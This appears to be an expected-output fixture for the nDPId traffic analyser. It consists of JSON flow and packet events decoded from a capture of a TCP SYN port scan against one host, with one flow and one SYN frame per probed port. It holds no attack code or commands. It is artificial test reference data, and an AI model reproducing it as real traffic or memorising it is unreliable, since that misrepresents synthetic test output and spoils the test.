-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1978,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1967,"flow_packet_id":1,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061410,"pkt":"ACYLMQczACWzv5HuCABFAAAs+6cAADQGGMusEAAIQA2GNIzT6nTdU4MZAAAAAGACBABKFwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1979,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1979,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1968,"flow_packet_id":1,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061410,"pkt":"ACYLMQczACWzv5HuCABFAAAscTcAADAGpzusEAAIQA2GNIzTA\/3dU4MZAAAAAGACBAAwjwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1980,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1980,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1969,"flow_packet_id":1,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061410,"pkt":"ACYLMQczACWzv5HuCABFAAAsQq0AACUG4MWsEAAIQA2GNIzTJxzdU4MZAAAAAGACCAAJcAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1981,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3261,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1981,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1970,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsKY4AADkG5eSsEAAIQA2GNIzTDL3dU4MZAAAAAGACCAAjzwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1982,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49157,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1982,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1971,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAseEMAADcGmS+sEAAIQA2GNIzTwAXdU4MZAAAAAGACEABohgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1983,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1983,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1972,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAss4gAADIGYuqsEAAIQA2GNIzTAgDdU4MZAAAAAGACDAAqjAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1984,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1044,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1984,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1973,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAs5VEAACYGPSGsEAAIQA2GNIzTBBTdU4MZAAAAAGACDAAoeAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1985,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3268,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1985,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1974,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsuG8AADcGWQOsEAAIQA2GNIzTDMTdU4MZAAAAAGACEAAbyAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1986,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1986,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1975,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAslPkAACYGjXmsEAAIQA2GNIzTF0rdU4MZAAAAAGACDAAVQgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1987,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1987,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1976,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAshy8AACwGlUOsEAAIQA2GNIzTFJXdU4MZAAAAAGACBAAf9wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1988,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1988,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1977,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAs66kAACoGMsmsEAAIQA2GNIzTB\/LdU4MZAAAAAGACDAAkmgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1989,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1989,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1978,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAslfEAACwGhoGsEAAIQA2GNIzTF3XdU4MZAAAAAGACBAAdFwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1990,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1990,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1979,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsB4gAADsGBeusEAAIQA2GNIzTBFbdU4MZAAAAAGACEAAkNgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1991,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1991,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1980,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ7wAADkG57asEAAIQA2GNIzTCp7dU4MZAAAAAGACCAAl7gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1992,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1104,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1992,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1981,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsUvkAADoGu3msEAAIQA2GNIzTBFDdU4MZAAAAAGACDAAoPAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1993,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1812,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1993,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1982,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ3YAADUGq\/ysEAAIQA2GNIzTBxTdU4MZAAAAAGACCAApeAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1994,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1994,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1983,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsTd8AAC4GzJOsEAAIQA2GNIzTATLdU4MZAAAAAGACDAArWgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1995,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1995,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1984,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsYRgAADUGslqsEAAIQA2GNIzTC9fdU4MZAAAAAGACCAAktQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1996,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2401,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1996,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1985,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAs4skAACoGO6msEAAIQA2GNIzTCWHdU4MZAAAAAGACDAAjKwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1997,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1863,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1997,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1986,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAs3AEAACgGRHGsEAAIQA2GNIzTB0fdU4MZAAAAAGACBAAtRQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1998,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1998,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1987,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsEIIAAC4GCfGsEAAIQA2GNIzTwADdU4MZAAAAAGACDABsiwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1999,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1999,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1988,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsSxwAADUGyFasEAAIQA2GNIzTJErdU4MZAAAAAGACCAAMQgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2000,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2000,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1989,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsk5cAACsGidusEAAIQA2GNIzTImDdU4MZAAAAAGACEAAGLAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2001,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2001,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1990,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAsHsIAACgGAbGsEAAIQA2GNIzTBBndU4MZAAAAAGACBAAwcwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2002,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061416,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2002,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1991,"flow_packet_id":1,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061416,"pkt":"ACYLMQczACWzv5HuCABFAAAssGQAACgGcA6sEAAIQA2GNIzTCDfdU4MZAAAAAGACBAAsVQAAAgQFtA=="} 